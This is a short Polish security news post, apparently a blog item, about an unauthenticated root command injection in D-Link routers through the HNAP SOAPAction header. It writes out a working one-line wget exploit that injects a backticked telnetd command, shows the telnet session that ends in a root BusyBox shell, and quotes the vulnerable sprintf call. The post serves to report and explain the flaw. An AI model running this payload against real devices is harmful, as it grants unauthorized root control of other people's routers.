Nowe D-Linki – nowy sposób na zdobycie roota bez uwierzytelnienia

Niedawno pisaliśmy o nowych D-Linkach, a teraz pojawiło się ciekawe badanie pokazujące w jaki sposób zrealizować nieuwierzytelniony dostęp na root-a.

Wystarczy jeden prosty request HTTP…

wget --header='SOAPAction: "http://purenetworks.com/HNAP1/GetDeviceSettings/`telnetd`"' http://192.168.0.1/HNAP1
$ telnet 192.168.0.1
Trying 192.168.0.1...
Connected to 192.168.0.1.
Escape character is '^]'.
 
 
BusyBox v1.14.1 (2015-02-11 17:15:51 CST) built-in shell (msh)
Enter 'help' for a list of built-in commands.
 
#

Winne jest bezpośrednie przekazanie parametru z tego requestu do funkcji:

sprintf(command, “sh %s%s.sh > /dev/console”, “/var/run/”, SOAPAction);

Kto by się przejmował jakimś filtrowaniem wejścia, prawda? :)

Fanom tego typu zabaw polecam oczywiście zakup tego urządzenia i prześledzenie cytowanego badania na blogu devttys0.

–ms